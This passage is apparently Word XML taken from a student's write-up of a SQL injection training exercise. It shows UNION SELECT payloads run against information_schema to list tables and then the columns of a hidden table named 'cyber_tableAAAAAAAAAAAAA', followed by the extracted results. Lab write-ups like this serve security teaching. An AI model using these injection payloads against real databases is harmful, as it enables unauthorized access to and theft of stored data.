        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>) #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F56E494" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The output successfully dumped the table names. Among standard tables like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>products</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, I discovered a hidden, obfuscated table named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cyber_tableAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. This was clearly the intended target table for this exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538BE8F1" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Final Extraction:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Knowing the actual table name, I adjusted my initial column-extraction payload to target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>cyber_tableAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>sqlitraining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397443F6" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Final Payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">a%' UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>convert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> using latin1), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>convert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> using latin1), 4, 5 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>cyber_tableAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60091D" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Results:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The injection successfully extracted the schema for the hidden table. The columns present in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>cyber_tableAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4A61B8" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7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cyberHour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F93B4EB" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7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cyberId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14FD948C" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EA78B7" w:rsidSect="0047033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2AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B24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450"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AEEC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5F04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0D4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E1DE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFE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03368"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9FC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01105"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47D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84A47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="902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7504"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBD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378C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61E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57DD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C02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B1140"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC4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B6E02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CD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44E62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9358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C01732"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="122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37CA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F84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77B84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="851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F4AE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CFE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23260">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2052881089">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2093886475">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="529343753">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="610554083">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1408068345">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="742683693">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1032073949">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1517576515">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="164981710">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="249242169">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="203175553">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2127581890">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="777067438">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1414280633">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="809054245">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1448615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D9"/>
    <w:rsid w:val="001A054F"/>
    <w:rsid w:val="00276EDC"/>
    <w:rsid w:val="00470332"/>
    <w:rsid w:val="008440D9"/>
    <w:rsid w:val="00B65341"/>
    <w:rsid w:val="00E175E5"/>
    <w:rsid w:val="00EA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286D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EE9DC913-AB80-4351-9BED-23566FC3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4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8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7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4</Pages>
  <Words>1195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Orgad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ofek Orgad</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-05T18:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T14:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>